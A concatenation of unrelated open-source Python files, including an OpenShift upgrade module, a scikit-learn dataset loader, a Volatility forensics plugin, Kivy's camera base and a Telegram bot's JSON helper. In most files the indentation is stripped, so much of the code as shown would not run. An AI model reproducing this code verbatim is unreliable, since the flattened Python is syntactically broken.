            if line == '* else':
                pass  # the catch-all bullet is neither a group nor a site
            elif line[0] == '*':
                groups.append(line)
            else:
                count = count + 1
        self._pack.setSites('\n'.join(groups), count)
        self._first = False
class _SitesExtension(Extension):
def __init__(self, pack):
super(_SitesExtension, self).__init__()
self._pack = pack
def extendMarkdown(self, md, md_globals):
ssp = _SitesProcessor(md.parser, self._pack)
md.parser.blockprocessors.add('sites', ssp, '>empty')
class _Pack(object):
def __init__(self, cl, ss, tpl):
self._cl_head = None
self._cl_body = None
self._ss_group = None
self._ss_count = None
self._tpl = tpl
cle = _ChangeLogExtension(self)
unused = markdown(cl, [cle])
sse = _SitesExtension(self)
unused = markdown(ss, [sse])
self._cl = '{0}\n\n{1}'.format(self._cl_head, self._cl_body)
def setChangeLog(self, head, body):
self._cl_head = head
self._cl_body = body
def setSites(self, group, count):
self._ss_group = group
self._ss_count = count
def getResult(self, edition, url):
args = {
'changelog': self._cl,
'sites': self._ss_group,
'count': self._ss_count,
'edition': _MESSAGE[edition].format(url=url),
}
summary = self._tpl.format(**args)
return summary
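    # getResult() simply fills the markdown template; e.g. (hypothetical call)
    # pack.getResult('full', 'https://example.com/lite') embeds the Lite-edition
    # pointer from _MESSAGE['full'] into the rendered summary.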
def make_summary():
fin = open(_CHANGELOG_PATH, 'r')
cl = fin.read()
fin.close()
fin = open(_SITES_PATH, 'r')
ss = fin.read()
fin.close()
fin = open(_TEMPLATE_PATH, 'r')
tpl = fin.read()
tpl = tpl.decode('utf-8')
fin.close()
pack = _Pack(cl, ss, tpl)
return pack
def main(args=None):
if args is None:
args = sys.argv
summary = make_summary()
result = summary.getResult('both', '')
summary_path = to_abs_path('../../dest/summary.md')
with open(summary_path, 'w') as fout:
fout.write(result.encode('utf-8'))
return 0
if __name__ == '__main__':
exit_code = main(sys.argv)
sys.exit(exit_code)
# ex: ts=4 sts=4 sw=4 et
# sublime: tab_size 4; translate_tabs_to_spaces true; detect_indentation false; use_tab_stops true;
# kate: space-indent on; indent-width 4;
| bsd-2-clause |
wbrefvem/openshift-ansible | playbooks/common/openshift-cluster/upgrades/library/openshift_upgrade_config.py | 35 | 5312 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Ansible module for modifying OpenShift configs during an upgrade"""
import os
import yaml
DOCUMENTATION = '''
---
module: openshift_upgrade_config
short_description: OpenShift Upgrade Config
author: Jason DeTiberus
requirements: [ ]
'''
EXAMPLES = '''
'''
def modify_api_levels(level_list, remove, ensure, msg_prepend='',
msg_append=''):
""" modify_api_levels """
changed = False
changes = []
if not isinstance(remove, list):
remove = []
if not isinstance(ensure, list):
ensure = []
if not isinstance(level_list, list):
new_list = []
changed = True
changes.append("%s created missing %s" % (msg_prepend, msg_append))
else:
new_list = level_list
for level in remove:
if level in new_list:
new_list.remove(level)
changed = True
changes.append("%s removed %s %s" % (msg_prepend, level, msg_append))
for level in ensure:
if level not in new_list:
new_list.append(level)
changed = True
changes.append("%s added %s %s" % (msg_prepend, level, msg_append))
return {'new_list': new_list, 'changed': changed, 'changes': changes}
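# A quick illustration of the bookkeeping above, with hypothetical values and
# written as an interpreter session so that importing this module stays
# side-effect free:
#
#   >>> modify_api_levels(['v1beta3', 'v1'], remove=['v1beta3'], ensure=['v1'],
#   ...                   msg_prepend='master-config.yaml:', msg_append='from apiLevels')
#   {'new_list': ['v1'], 'changed': True,
#    'changes': ['master-config.yaml: removed v1beta3 from apiLevels']}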
def upgrade_master_3_0_to_3_1(ansible_module, config_base, backup):
"""Main upgrade method for 3.0 to 3.1."""
changes = []
# Facts do not get transferred to the hosts where custom modules run,
# need to make some assumptions here.
master_config = os.path.join(config_base, 'master/master-config.yaml')
master_cfg_file = open(master_config, 'r')
config = yaml.safe_load(master_cfg_file.read())
master_cfg_file.close()
# Remove unsupported api versions and ensure supported api versions from
# master config
unsupported_levels = ['v1beta1', 'v1beta2', 'v1beta3']
supported_levels = ['v1']
result = modify_api_levels(config.get('apiLevels'), unsupported_levels,
supported_levels, 'master-config.yaml:', 'from apiLevels')
if result['changed']:
config['apiLevels'] = result['new_list']
changes.append(result['changes'])
if 'kubernetesMasterConfig' in config and 'apiLevels' in config['kubernetesMasterConfig']:
config['kubernetesMasterConfig'].pop('apiLevels')
changes.append('master-config.yaml: removed kubernetesMasterConfig.apiLevels')
# Add masterCA to serviceAccountConfig
if 'serviceAccountConfig' in config and 'masterCA' not in config['serviceAccountConfig']:
config['serviceAccountConfig']['masterCA'] = config['oauthConfig'].get('masterCA', 'ca.crt')
# Add proxyClientInfo to master-config
if 'proxyClientInfo' not in config['kubernetesMasterConfig']:
config['kubernetesMasterConfig']['proxyClientInfo'] = {
'certFile': 'master.proxy-client.crt',
'keyFile': 'master.proxy-client.key'
}
changes.append("master-config.yaml: added proxyClientInfo")
if len(changes) > 0:
if backup:
# TODO: Check success:
ansible_module.backup_local(master_config)
# Write the modified config:
out_file = open(master_config, 'w')
out_file.write(yaml.safe_dump(config, default_flow_style=False))
out_file.close()
return changes
def upgrade_master(ansible_module, config_base, from_version, to_version, backup):
"""Upgrade entry point."""
if from_version == '3.0':
if to_version == '3.1':
return upgrade_master_3_0_to_3_1(ansible_module, config_base, backup)
def main():
""" main """
# disabling pylint errors for global-variable-undefined and invalid-name
# for 'global module' usage, since it is required to use ansible_facts
# pylint: disable=global-variable-undefined, invalid-name,
# redefined-outer-name
global module
module = AnsibleModule( # noqa: F405
argument_spec=dict(
config_base=dict(required=True),
from_version=dict(required=True, choices=['3.0']),
to_version=dict(required=True, choices=['3.1']),
role=dict(required=True, choices=['master']),
backup=dict(required=False, default=True, type='bool')
),
supports_check_mode=True,
)
from_version = module.params['from_version']
to_version = module.params['to_version']
role = module.params['role']
backup = module.params['backup']
config_base = module.params['config_base']
try:
changes = []
if role == 'master':
changes = upgrade_master(module, config_base, from_version,
to_version, backup)
changed = len(changes) > 0
return module.exit_json(changed=changed, changes=changes)
# ignore broad-except error to avoid stack trace to ansible user
# pylint: disable=broad-except
except Exception as e:
return module.fail_json(msg=str(e))
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, wrong-import-position
# import module snippets
from ansible.module_utils.basic import * # noqa: E402,F403
if __name__ == '__main__':
main()
| apache-2.0 |
etkirsch/scikit-learn | sklearn/datasets/species_distributions.py | 198 | 7923 | """
=============================
Species distribution dataset
=============================
This dataset represents the geographic distribution of species.
The dataset is provided by Phillips et. al. (2006).
The two species are:
- `"Bradypus variegatus"
<http://www.iucnredlist.org/apps/redlist/details/3038/0>`_ ,
the Brown-throated Sloth.
- `"Microryzomys minutus"
<http://www.iucnredlist.org/apps/redlist/details/13408/0>`_ ,
   also known as the Forest Small Rice Rat, a rodent that lives in
   Colombia, Ecuador, Peru, and Venezuela.
References:
* `"Maximum entropy modeling of species geographic distributions"
<http://www.cs.princeton.edu/~schapire/papers/ecolmod.pdf>`_
S. J. Phillips, R. P. Anderson, R. E. Schapire - Ecological Modelling,
190:231-259, 2006.
Notes:
* See examples/applications/plot_species_distribution_modeling.py
for an example of using this dataset
"""
# Authors: Peter Prettenhofer <[email protected]>
# Jake Vanderplas <[email protected]>
#
# License: BSD 3 clause
from io import BytesIO
from os import makedirs
from os.path import join
from os.path import exists
try:
# Python 2
from urllib2 import urlopen
PY2 = True
except ImportError:
# Python 3
from urllib.request import urlopen
PY2 = False
import numpy as np
from sklearn.datasets.base import get_data_home, Bunch
from sklearn.externals import joblib
DIRECTORY_URL = "http://www.cs.princeton.edu/~schapire/maxent/datasets/"
SAMPLES_URL = join(DIRECTORY_URL, "samples.zip")
COVERAGES_URL = join(DIRECTORY_URL, "coverages.zip")
DATA_ARCHIVE_NAME = "species_coverage.pkz"
def _load_coverage(F, header_length=6, dtype=np.int16):
"""Load a coverage file from an open file object.
This will return a numpy array of the given dtype
"""
header = [F.readline() for i in range(header_length)]
make_tuple = lambda t: (t.split()[0], float(t.split()[1]))
header = dict([make_tuple(line) for line in header])
M = np.loadtxt(F, dtype=dtype)
    nodata = header[b'NODATA_value']
    if nodata != -9999:
        # Normalize the file's declared missing-data marker to the -9999
        # sentinel expected by the rest of this module.
        M[M == nodata] = -9999
return M
def _load_csv(F):
"""Load csv file.
Parameters
----------
F : file object
CSV file open in byte mode.
Returns
-------
rec : np.ndarray
record array representing the data
"""
if PY2:
# Numpy recarray wants Python 2 str but not unicode
names = F.readline().strip().split(',')
else:
# Numpy recarray wants Python 3 str but not bytes...
names = F.readline().decode('ascii').strip().split(',')
rec = np.loadtxt(F, skiprows=0, delimiter=',', dtype='a22,f4,f4')
rec.dtype.names = names
return rec
def construct_grids(batch):
"""Construct the map grid from the batch object
Parameters
----------
batch : Batch object
The object returned by :func:`fetch_species_distributions`
Returns
-------
(xgrid, ygrid) : 1-D arrays
The grid corresponding to the values in batch.coverages
"""
# x,y coordinates for corner cells
xmin = batch.x_left_lower_corner + batch.grid_size
xmax = xmin + (batch.Nx * batch.grid_size)
ymin = batch.y_left_lower_corner + batch.grid_size
ymax = ymin + (batch.Ny * batch.grid_size)
# x coordinates of the grid cells
xgrid = np.arange(xmin, xmax, batch.grid_size)
# y coordinates of the grid cells
ygrid = np.arange(ymin, ymax, batch.grid_size)
return (xgrid, ygrid)
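# With the parameters used by fetch_species_distributions below
# (x_left_lower_corner=-94.8, Nx=1212, grid_size=0.05), this yields
# xgrid = np.arange(-94.75, -34.15, 0.05): 1212 evenly spaced longitudes.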
def fetch_species_distributions(data_home=None,
download_if_missing=True):
"""Loader for species distribution dataset from Phillips et. al. (2006)
Read more in the :ref:`User Guide <datasets>`.
Parameters
----------
data_home : optional, default: None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/scikit_learn_data' subfolders.
download_if_missing: optional, True by default
        If False, raise an IOError if the data is not locally available
instead of trying to download the data from the source site.
Returns
--------
The data is returned as a Bunch object with the following attributes:
coverages : array, shape = [14, 1592, 1212]
These represent the 14 features measured at each point of the map grid.
The latitude/longitude values for the grid are discussed below.
Missing data is represented by the value -9999.
train : record array, shape = (1623,)
The training points for the data. Each point has three fields:
- train['species'] is the species name
- train['dd long'] is the longitude, in degrees
- train['dd lat'] is the latitude, in degrees
test : record array, shape = (619,)
The test points for the data. Same format as the training data.
Nx, Ny : integers
The number of longitudes (x) and latitudes (y) in the grid
x_left_lower_corner, y_left_lower_corner : floats
The (x,y) position of the lower-left corner, in degrees
grid_size : float
The spacing between points of the grid, in degrees
Notes
------
This dataset represents the geographic distribution of species.
The dataset is provided by Phillips et. al. (2006).
The two species are:
- `"Bradypus variegatus"
<http://www.iucnredlist.org/apps/redlist/details/3038/0>`_ ,
the Brown-throated Sloth.
- `"Microryzomys minutus"
<http://www.iucnredlist.org/apps/redlist/details/13408/0>`_ ,
   also known as the Forest Small Rice Rat, a rodent that lives in
   Colombia, Ecuador, Peru, and Venezuela.
References
----------
* `"Maximum entropy modeling of species geographic distributions"
<http://www.cs.princeton.edu/~schapire/papers/ecolmod.pdf>`_
S. J. Phillips, R. P. Anderson, R. E. Schapire - Ecological Modelling,
190:231-259, 2006.
Notes
-----
* See examples/applications/plot_species_distribution_modeling.py
for an example of using this dataset with scikit-learn
"""
data_home = get_data_home(data_home)
if not exists(data_home):
makedirs(data_home)
# Define parameters for the data files. These should not be changed
# unless the data model changes. They will be saved in the npz file
# with the downloaded data.
extra_params = dict(x_left_lower_corner=-94.8,
Nx=1212,
y_left_lower_corner=-56.05,
Ny=1592,
grid_size=0.05)
dtype = np.int16
if not exists(join(data_home, DATA_ARCHIVE_NAME)):
print('Downloading species data from %s to %s' % (SAMPLES_URL,
data_home))
X = np.load(BytesIO(urlopen(SAMPLES_URL).read()))
for f in X.files:
fhandle = BytesIO(X[f])
if 'train' in f:
train = _load_csv(fhandle)
if 'test' in f:
test = _load_csv(fhandle)
print('Downloading coverage data from %s to %s' % (COVERAGES_URL,
data_home))
X = np.load(BytesIO(urlopen(COVERAGES_URL).read()))
coverages = []
for f in X.files:
fhandle = BytesIO(X[f])
print(' - converting', f)
coverages.append(_load_coverage(fhandle))
coverages = np.asarray(coverages, dtype=dtype)
bunch = Bunch(coverages=coverages,
test=test,
train=train,
**extra_params)
joblib.dump(bunch, join(data_home, DATA_ARCHIVE_NAME), compress=9)
else:
bunch = joblib.load(join(data_home, DATA_ARCHIVE_NAME))
return bunch
| bsd-3-clause |
freddierice/volatility | volatility/plugins/linux/vma_cache.py | 58 | 2724 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: [email protected]
@organization:
"""
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
from volatility.plugins.linux.slab_info import linux_slabinfo
class linux_vma_cache(linux_common.AbstractLinuxCommand):
"""Gather VMAs from the vm_area_struct cache"""
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
self._config.add_option('UNALLOCATED', short_option = 'u',
default = False,
help = 'Show unallocated',
action = 'store_true')
def calculate(self):
linux_common.set_plugin_members(self)
has_owner = self.profile.obj_has_member("mm_struct", "owner")
cache = linux_slabinfo(self._config).get_kmem_cache("vm_area_struct", self._config.UNALLOCATED)
for vm in cache:
start = vm.vm_start
end = vm.vm_end
if has_owner and vm.vm_mm and vm.vm_mm.is_valid():
task = vm.vm_mm.owner
(task_name, pid) = (task.comm, task.pid)
else:
(task_name, pid) = ("", "")
if vm.vm_file and vm.vm_file.is_valid():
path = vm.vm_file.dentry.get_partial_path()
else:
path = ""
yield task_name, pid, start, end, path
def render_text(self, outfd, data):
self.table_header(outfd, [("Process", "16"),
("PID", "6"),
("Start", "[addrpad]"),
("End", "[addrpad]"),
("Path", "")])
for task_name, pid, start, end, path in data:
self.table_row(outfd, task_name, pid, start, end, path)
| gpl-2.0 |
rrampage/rethinkdb | external/v8_3.30.33.16/buildtools/checkdeps/rules.py | 65 | 6692 | # Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Base classes to represent dependency rules, used by checkdeps.py"""
import os
import re
class Rule(object):
"""Specifies a single rule for an include, which can be one of
ALLOW, DISALLOW and TEMP_ALLOW.
"""
# These are the prefixes used to indicate each type of rule. These
# are also used as values for self.allow to indicate which type of
# rule this is.
ALLOW = '+'
DISALLOW = '-'
TEMP_ALLOW = '!'
def __init__(self, allow, directory, dependent_directory, source):
self.allow = allow
self._dir = directory
self._dependent_dir = dependent_directory
self._source = source
def __str__(self):
return '"%s%s" from %s.' % (self.allow, self._dir, self._source)
def AsDependencyTuple(self):
"""Returns a tuple (allow, dependent dir, dependee dir) for this rule,
which is fully self-sufficient to answer the question whether the dependent
is allowed to depend on the dependee, without knowing the external
context."""
return self.allow, self._dependent_dir or '.', self._dir or '.'
def ParentOrMatch(self, other):
"""Returns true if the input string is an exact match or is a parent
of the current rule. For example, the input "foo" would match "foo/bar"."""
return self._dir == other or self._dir.startswith(other + '/')
def ChildOrMatch(self, other):
"""Returns true if the input string would be covered by this rule. For
example, the input "foo/bar" would match the rule "foo"."""
return self._dir == other or other.startswith(self._dir + '/')
class MessageRule(Rule):
"""A rule that has a simple message as the reason for failing,
unrelated to directory or source.
"""
def __init__(self, reason):
super(MessageRule, self).__init__(Rule.DISALLOW, '', '', '')
self._reason = reason
def __str__(self):
return self._reason
def ParseRuleString(rule_string, source):
"""Returns a tuple of a character indicating what type of rule this
is, and a string holding the path the rule applies to.
"""
if not rule_string:
raise Exception('The rule string "%s" is empty\nin %s' %
(rule_string, source))
if not rule_string[0] in [Rule.ALLOW, Rule.DISALLOW, Rule.TEMP_ALLOW]:
raise Exception(
'The rule string "%s" does not begin with a "+", "-" or "!".' %
rule_string)
return rule_string[0], rule_string[1:]
class Rules(object):
"""Sets of rules for files in a directory.
By default, rules are added to the set of rules applicable to all
dependee files in the directory. Rules may also be added that apply
only to dependee files whose filename (last component of their path)
matches a given regular expression; hence there is one additional
set of rules per unique regular expression.
"""
def __init__(self):
"""Initializes the current rules with an empty rule list for all
files.
"""
# We keep the general rules out of the specific rules dictionary,
# as we need to always process them last.
self._general_rules = []
# Keys are regular expression strings, values are arrays of rules
# that apply to dependee files whose basename matches the regular
# expression. These are applied before the general rules, but
# their internal order is arbitrary.
self._specific_rules = {}
def __str__(self):
result = ['Rules = {\n (apply to all files): [\n%s\n ],' % '\n'.join(
' %s' % x for x in self._general_rules)]
for regexp, rules in self._specific_rules.iteritems():
result.append(' (limited to files matching %s): [\n%s\n ]' % (
regexp, '\n'.join(' %s' % x for x in rules)))
result.append(' }')
return '\n'.join(result)
def AsDependencyTuples(self, include_general_rules, include_specific_rules):
"""Returns a list of tuples (allow, dependent dir, dependee dir) for the
specified rules (general/specific). Currently only general rules are
supported."""
def AddDependencyTuplesImpl(deps, rules, extra_dependent_suffix=""):
for rule in rules:
(allow, dependent, dependee) = rule.AsDependencyTuple()
tup = (allow, dependent + extra_dependent_suffix, dependee)
deps.add(tup)
deps = set()
if include_general_rules:
AddDependencyTuplesImpl(deps, self._general_rules)
if include_specific_rules:
for regexp, rules in self._specific_rules.iteritems():
AddDependencyTuplesImpl(deps, rules, "/" + regexp)
return deps
def AddRule(self, rule_string, dependent_dir, source, dependee_regexp=None):
"""Adds a rule for the given rule string.
Args:
rule_string: The include_rule string read from the DEPS file to apply.
source: A string representing the location of that string (filename, etc.)
so that we can give meaningful errors.
dependent_dir: The directory to which this rule applies.
dependee_regexp: The rule will only be applied to dependee files
whose filename (last component of their path)
matches the expression. None to match all
dependee files.
"""
rule_type, rule_dir = ParseRuleString(rule_string, source)
if not dependee_regexp:
rules_to_update = self._general_rules
else:
if dependee_regexp in self._specific_rules:
rules_to_update = self._specific_rules[dependee_regexp]
else:
rules_to_update = []
# Remove any existing rules or sub-rules that apply. For example, if we're
# passed "foo", we should remove "foo", "foo/bar", but not "foobar".
rules_to_update = [x for x in rules_to_update
if not x.ParentOrMatch(rule_dir)]
rules_to_update.insert(0, Rule(rule_type, rule_dir, dependent_dir, source))
if not dependee_regexp:
self._general_rules = rules_to_update
else:
self._specific_rules[dependee_regexp] = rules_to_update
def RuleApplyingTo(self, include_path, dependee_path):
"""Returns the rule that applies to |include_path| for a dependee
file located at |dependee_path|.
"""
dependee_filename = os.path.basename(dependee_path)
for regexp, specific_rules in self._specific_rules.iteritems():
if re.match(regexp, dependee_filename):
for rule in specific_rules:
if rule.ChildOrMatch(include_path):
return rule
for rule in self._general_rules:
if rule.ChildOrMatch(include_path):
return rule
return MessageRule('no rule applying.')
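if __name__ == '__main__':
    # Tiny self-contained sketch (hypothetical paths): allow includes of
    # "base" from everything under "chrome", then query a specific include.
    example_rules = Rules()
    example_rules.AddRule('+base', 'chrome', 'chrome/DEPS')
    print(example_rules.RuleApplyingTo('base/logging.h', 'chrome/app/main.cc'))
    # Prints: "+base" from chrome/DEPS.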
| agpl-3.0 |
manthansharma/kivy | kivy/core/camera/__init__.py | 15 | 4285 | '''
Camera
======
Core class for acquiring the camera and converting its input into a
:class:`~kivy.graphics.texture.Texture`.
.. versionchanged:: 1.10.0
The pygst and videocapture providers have been removed.
.. versionchanged:: 1.8.0
There is now 2 distinct Gstreamer implementation: one using Gi/Gst
working for both Python 2+3 with Gstreamer 1.0, and one using PyGST
working only for Python 2 + Gstreamer 0.10.
'''
__all__ = ('CameraBase', 'Camera')
from kivy.utils import platform
from kivy.event import EventDispatcher
from kivy.logger import Logger
from kivy.core import core_select_lib
class CameraBase(EventDispatcher):
'''Abstract Camera Widget class.
Concrete camera classes must implement initialization and
frame capturing to a buffer that can be uploaded to the gpu.
:Parameters:
`index`: int
Source index of the camera.
`size`: tuple (int, int)
Size at which the image is drawn. If no size is specified,
it defaults to the resolution of the camera image.
`resolution`: tuple (int, int)
Resolution to try to request from the camera.
Used in the gstreamer pipeline by forcing the appsink caps
to this resolution. If the camera doesnt support the resolution,
a negotiation error might be thrown.
:Events:
`on_load`
Fired when the camera is loaded and the texture has become
available.
`on_texture`
Fired each time the camera texture is updated.
'''
__events__ = ('on_load', 'on_texture')
def __init__(self, **kwargs):
kwargs.setdefault('stopped', False)
kwargs.setdefault('resolution', (640, 480))
kwargs.setdefault('index', 0)
self.stopped = kwargs.get('stopped')
self._resolution = kwargs.get('resolution')
self._index = kwargs.get('index')
self._buffer = None
self._format = 'rgb'
self._texture = None
self.capture_device = None
kwargs.setdefault('size', self._resolution)
super(CameraBase, self).__init__()
self.init_camera()
if not self.stopped:
self.start()
def _set_resolution(self, res):
self._resolution = res
self.init_camera()
def _get_resolution(self):
return self._resolution
resolution = property(lambda self: self._get_resolution(),
lambda self, x: self._set_resolution(x),
doc='Resolution of camera capture (width, height)')
def _set_index(self, x):
if x == self._index:
return
self._index = x
self.init_camera()
def _get_index(self):
        return self._index
index = property(lambda self: self._get_index(),
lambda self, x: self._set_index(x),
doc='Source index of the camera')
def _get_texture(self):
return self._texture
texture = property(lambda self: self._get_texture(),
doc='Return the camera texture with the latest capture')
def init_camera(self):
'''Initialise the camera (internal)'''
pass
def start(self):
'''Start the camera acquire'''
self.stopped = False
def stop(self):
'''Release the camera'''
self.stopped = True
def _update(self, dt):
'''Update the camera (internal)'''
pass
def _copy_to_gpu(self):
'''Copy the the buffer into the texture'''
if self._texture is None:
Logger.debug('Camera: copy_to_gpu() failed, _texture is None !')
return
self._texture.blit_buffer(self._buffer, colorfmt=self._format)
self._buffer = None
self.dispatch('on_texture')
def on_texture(self):
pass
def on_load(self):
pass
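# A rough sketch of what a concrete provider has to supply (names are
# illustrative; the real implementations live in the camera_* modules
# selected below):
#
#   class CameraDummy(CameraBase):
#       def init_camera(self):
#           # open the device for self._index at self._resolution and
#           # create self._texture once the frame size is known
#           ...
#       def _update(self, dt):
#           self._buffer = ...   # grab one raw frame in self._format
#           self._copy_to_gpu()  # uploads the buffer, fires 'on_texture'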
# Load the appropriate providers
providers = ()
if platform == 'macosx':
providers += (('avfoundation', 'camera_avfoundation',
'CameraAVFoundation'), )
elif platform == 'android':
providers += (('android', 'camera_android', 'CameraAndroid'), )
providers += (('opencv', 'camera_opencv', 'CameraOpenCV'), )
Camera = core_select_lib('camera', (providers))
| mit |
J-Rios/TelegramBots | MolaBot/TSjson.py | 1 | 10795 | # -*- coding: utf-8 -*-
'''
Script: MolaBot.py
Description:
    Telegram bot that manages a whole reputation system for the users belonging to a
    group. It lets a user give "Likes" to other users' messages, and the global number
    of "Likes" (the sum of the likes on every message from the same user) determines
    that user's reputation points.
Author: Jose Rios Rubio
Date: 26/07/2017
Version: 1.7
'''
import os
import json
from threading import Lock
from collections import OrderedDict
class TSjson:
'''
    Thread-safe access class for reading and writing generic JSON files from any
    execution thread.
'''
    # Class constructor
    def __init__(self, file_name):
        self.lock = Lock()  # Initialize the lock
        self.file_name = file_name  # Keep the name of the file to manage
    # Function to read from a JSON file
    def read(self):
        try:  # Try to open the file
            self.lock.acquire()  # Acquire the mutex
            if not os.path.exists(self.file_name):  # If the file does not exist
                read = {}  # Return an empty dictionary
            else:  # The file exists
                if not os.stat(self.file_name).st_size:  # If the file is empty
                    read = {}  # Return an empty dictionary
                else:  # The file exists and has content
                    with open(self.file_name, "r") as f:  # Open the file in read mode
                        read = json.load(f, object_pairs_hook=OrderedDict)  # Read the whole file and return the JSON data as an ordered dictionary
        except:  # Error while trying to open the file
            print("    Error opening the file {} for reading".format(self.file_name))  # Log the error to the console
            read = None  # Return None
        finally:  # Finally, whether an exception occurred or not
            self.lock.release()  # Release the mutex
        return read  # Return the result of the read
    # Function to write to a JSON file
    def write(self, data):
        # If the directory that holds the data files does not exist, create it
        directory = os.path.dirname(self.file_name)  # Get the name of the directory containing the file
        if not os.path.exists(directory):  # If the directory (path) does not exist
            os.makedirs(directory)  # Create the directory
        try:  # Try to open the file
            self.lock.acquire()  # Acquire the mutex
            with open(self.file_name, "w") as f:  # Open the file in write mode (overwrites)
                #if CONST['PYTHON'] == 2:  # Python 2 compatibility
                #    f.write("\n{}\n".format(json.dumps(data, ensure_ascii=False, indent=4)))  # Write the JSON data, keeping non-ASCII characters and an indentation of 4 spaces
                #else:
                f.write("\n{}\n".format(json.dumps(data, indent=4)))  # Write the JSON data to the file, ensuring ASCII characters and an indentation of 4 spaces
        except:  # Error while trying to open the file
            print("    Error opening the file {} for writing".format(self.file_name))  # Log the error to the console
        finally:  # Finally, whether an exception occurred or not
            self.lock.release()  # Release the mutex
    # Function to read the content of a JSON file (the JSON data)
    def read_content(self):
        read = self.read()  # Read the whole JSON file
        if read != {}:  # If the read is not empty
            return read['Content']  # Return the content of the read (the JSON data)
        else:  # Empty read
            return read  # Return the empty read
    # Function to append new JSON data to the content of a JSON file
    def write_content(self, data):
        # If the directory that holds the data files does not exist, create it
        directory = os.path.dirname(self.file_name)  # Get the name of the directory containing the file
        if not os.path.exists(directory):  # If the directory (path) does not exist
            os.makedirs(directory)  # Create the directory
        try:  # Try to open the file
            self.lock.acquire()  # Acquire the mutex
            if os.path.exists(self.file_name) and os.stat(self.file_name).st_size:  # If the file exists and is not empty
                with open(self.file_name, "r") as f:  # Open the file in read mode
                    content = json.load(f, object_pairs_hook=OrderedDict)  # Read the whole file and return the JSON data as an ordered dictionary
                content['Content'].append(data)  # Append the new data to the JSON content
                with open(self.file_name, "w") as f:  # Open the file in write mode (overwrites)
                    f.write("\n{}\n".format(json.dumps(content, indent=4)))  # Write the JSON data to the file, ensuring ASCII characters and an indentation of 4 spaces
            else:  # The file does not exist or is empty
                with open(self.file_name, "w") as f:  # Open the file in write mode (overwrites)
                    f.write('\n{\n    "Content": []\n}\n')  # Write the basic content structure
                with open(self.file_name, "r") as f:  # Open the file in read mode
                    content = json.load(f)  # Read the whole file
                content['Content'].append(data)  # Append the data to the JSON content
                with open(self.file_name, "w") as f:  # Open the file in write mode (overwrites)
                    f.write("\n{}\n".format(json.dumps(content, indent=4)))  # Write the JSON data to the file, ensuring ASCII characters and an indentation of 4 spaces
        except IOError as e:
            print("    I/O error({0}): {1}".format(e.errno, e.strerror))
        except ValueError:
            print("    Error converting the data")
        except:  # Error while trying to open the file
            print("    Error opening the file {} for writing".format(self.file_name))  # Log the error to the console
        finally:  # Finally, whether an exception occurred or not
            self.lock.release()  # Release the mutex
    # Function to update a record in a JSON file
    # [Note: each JSON record needs at least 1 unique identifier element (uide); otherwise the update happens on the first element found]
    def update(self, data, uide):
        file_data = self.read()  # Read the whole JSON file
        # Look for the position of the record in the JSON content
        found = 0  # Found flag set to 0
        i = 0  # Initial position of the record set to 0
        for msg in file_data['Content']:  # For each message in the JSON file
            if data[uide] == msg[uide]:  # If the message has the searched UIDE
                found = 1  # Mark that the position has been found
                break  # Break out of the loop
            i = i + 1  # Increment the record position
        if found:  # If a record with the searched UIDE was found in the JSON file
            file_data['Content'][i] = data  # Update the JSON data holding that UIDE
            self.write(file_data)  # Write the updated record to the JSON file
        else:  # No JSON record with that UIDE was found
            print("    Error: UIDE not found in the file, or the file does not exist")  # Log the error to the console
    # Function to update nested data inside the records of a JSON file
    # [Note: each JSON record needs at least 1 unique identifier element (uide); otherwise the update happens on the first element found]
    def update_twice(self, data, uide1, uide2):
        file_data = self.read()  # Read the whole JSON file
        # Look for the position of the record in the JSON content
        found = 0  # Found flag set to 0
        i = 0  # Initial position of the record set to 0
        for msg in file_data['Content']:  # For each message in the JSON file
            if (data[uide1] == msg[uide1]) and (data[uide2] == msg[uide2]):  # If the message has both searched UIDEs
                found = 1  # Mark that the position has been found
                break  # Break out of the loop
            i = i + 1  # Increment the record position
        if found:  # If a record with the searched UIDEs was found in the JSON file
            file_data['Content'][i] = data  # Update the JSON data holding those UIDEs
            self.write(file_data)  # Write the updated record to the JSON file
        else:  # No JSON record with those UIDEs was found
            print("    Error: UIDE not found in the file, or the file does not exist")  # Log the error to the console
    # Function to clear all the data in a JSON file (currently unused)
    def clear_content(self):
        try:  # Try to open the file
            self.lock.acquire()  # Acquire the mutex
            if os.path.exists(self.file_name) and os.stat(self.file_name).st_size:  # If the file exists and is not empty
                with open(self.file_name, "w") as f:  # Open the file in write mode (overwrites)
                    f.write('\n{\n    "Content": [\n    ]\n}\n')  # Write the basic content structure
        except:  # Error while trying to open the file
            print("    Error opening the file {} for writing".format(self.file_name))  # Log the error to the console
        finally:  # Finally, whether an exception occurred or not
            self.lock.release()  # Release the mutex
    # Function to delete a JSON file (currently unused)
    def delete(self):
        self.lock.acquire()  # Acquire the mutex
        if os.path.exists(self.file_name):  # If the file exists
            os.remove(self.file_name)  # Delete the file
        self.lock.release()  # Release the mutex
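# Minimal usage sketch (hypothetical path and fields), guarded so it only
# runs when this module is executed directly:
if __name__ == '__main__':
    db = TSjson(os.path.join('data', 'demo.json'))
    db.write_content({'User_ID': 1234, 'Points': 0})  # append a new record
    db.update({'User_ID': 1234, 'Points': 1}, 'User_ID')  # 'User_ID' acts as the uide
    print(db.read_content())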
| gpl-3.0 |
powlo/script.module.pydevd | lib/test_pydevd_reload/test_pydevd_reload.py | 53 | 11450 | import os # @NoMove
import sys # @NoMove
sys.path.insert(0, os.path.realpath(os.path.abspath('..')))
import pydevd_reload
import tempfile
import unittest
SAMPLE_CODE = """
class C:
def foo(self):
return 0
@classmethod
def bar(cls):
return (0, 0)
@staticmethod
def stomp():
